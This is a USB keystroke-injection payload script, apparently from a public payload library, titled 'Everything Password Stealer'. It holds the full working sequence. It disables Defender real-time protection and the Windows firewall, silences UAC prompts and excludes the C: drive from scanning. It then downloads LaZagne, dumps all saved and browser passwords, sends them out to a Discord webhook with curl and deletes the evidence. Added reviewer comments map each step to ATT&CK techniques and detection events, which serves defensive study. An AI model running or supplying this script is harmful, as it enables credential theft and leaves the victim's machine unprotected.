omg-payloads/payloads/library/exfiltration/Everything-Password-Stealer/payload.txt


REM Title: Everything Password Stealer
REM Description: Steals every password in every windows 10 or 11 passwords with LaZagne
REM Bypasses UAC, Firewall, and Defender with persistence whatsoever
REM Exfil your data to your not-so private discord server with computer name as a filename (to avoid confusions as usual)
REM Author: DeadPool (just kidding, created by me, the one and only Spade)
REM NOTE(review): defender's reading of this script. It is keystroke injection from a USB HID device (ATT&CK T1200).
REM It needs an unlocked session of a local administrator: elevation comes from answering the UAC consent prompt with ALT y.
REM On a standard-user account the prompt asks for credentials instead, so that keystroke does not elevate.
REM Nothing below restores the settings it changes; a host where this ran stays weakened until they are reset.
REM Win+M minimises all open windows
GUI m
DELAY 2000
REM Open Windows Defender Settings
CTRL ESC
DELAY 750
STRING windows security
ENTER
DELAY 1500
ENTER
REM Navigate to Manage Settings
DELAY 500
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
ENTER
DELAY 500
REM Open and turn off Realtime Protection
REM ALT y presumably answers "Yes" on the UAC consent prompt raised by the toggle.
REM Detection: Defender records real-time protection being turned off as event 5001
REM in the Microsoft-Windows-Windows Defender/Operational log (ATT&CK T1562.001).
SPACE
DELAY 1000
ALT y
DELAY 1000
REM Exit security settings
ALT F4
DELAY 3000
GUI r
DELAY 1000
REM Open the Powershell as Administrator
REM CTRL-SHIFT ENTER in the Run dialog requests elevation; ALT y again answers the consent prompt.
REM Detection: elevated powershell.exe started from the Run dialog; with script block logging enabled,
REM every command typed below is recorded as event 4104 in Microsoft-Windows-PowerShell/Operational.
STRING powershell
CTRL-SHIFT ENTER
DELAY 2000
ALT y
ENTER
DELAY 1000
REM Sets ConsentPromptBehaviorAdmin to 0: administrators are elevated without a consent prompt.
REM UAC itself is not switched off by this value (ATT&CK T1548.002).
REM Detection: registry write to ...\Policies\System\ConsentPromptBehaviorAdmin (Sysmon event 13 or registry auditing).
STRING Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
ENTER
DELAY 1000
REM Despite the original "Firewall Part 1" label, this line turns off Defender real-time monitoring, not the firewall.
REM Mitigation: Defender Tamper Protection blocks this cmdlet change. Detection: Defender events 5001 and 5007.
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 1000
REM Disables Windows Firewall on the Domain, Public and Private profiles (ATT&CK T1562.004).
REM Detection: event 2003 in Microsoft-Windows-Windows Firewall With Advanced Security/Firewall.
STRING Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
ENTER
DELAY 1000
REM Writes the DisableAntiSpyware policy value for Defender.
REM Microsoft documents this value as ignored on current Windows client builds, and Tamper Protection blocks it;
REM its presence under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender is still a strong tampering indicator.
STRING New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
ENTER
DELAY 1000
REM Adds a Defender scan exclusion for "C:", i.e. the system drive.
REM Detection: Defender event 5007 (configuration changed). Remediation: audit exclusions with Get-MpPreference.
STRING Add-MpPreference -ExclusionPath "C:"
ENTER
DELAY 3000
REM Downloads the LaZagne v2.4.5 release binary over BITS into the machine-level TEMP directory as l.exe
REM (by default %SystemRoot%\Temp), then changes into that directory (ATT&CK T1197).
REM Detection: Microsoft-Windows-Bits-Client/Operational event 59 naming the GitHub release URL; new l.exe in machine TEMP.
STRING $Test = [System.Environment]::GetEnvironmentVariable('TEMP','Machine');Start-BitsTransfer https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe -Destination "$Test/l.exe"; cd $Test
ENTER
DELAY 15000
REM Runs l.exe twice ("all", then "browsers") and writes the output to <COMPUTERNAME>.txt in the current directory
REM (ATT&CK T1555, T1555.003), uploads that file with curl.exe as a multipart form to a Discord webhook
REM (ATT&CK T1567.004), then issues Remove-Item for the output file and l.exe with errors suppressed.
REM Detection: curl.exe spawned by powershell.exe posting a file to a Discord webhook URL; egress filtering can block it.
REM Response: check machine TEMP for l.exe and <COMPUTERNAME>.txt during triage, and treat every credential
REM stored on the host (browsers, mail clients, Wi-Fi, saved sessions) as exposed and rotate it.
STRING .\l.exe all -vv > "$env:computername.txt"; .\l.exe browsers -vv >> "$env:computername.txt"; curl.exe [DISCORD WEBHOOK URL] -F "file1=@$Test/$env:computername.txt"; Remove-Item "$x/$env:computername.txt", "$x/l.exe" -Force -ErrorAction SilentlyContinue
ENTER
STRING exit
ENTER
REM Done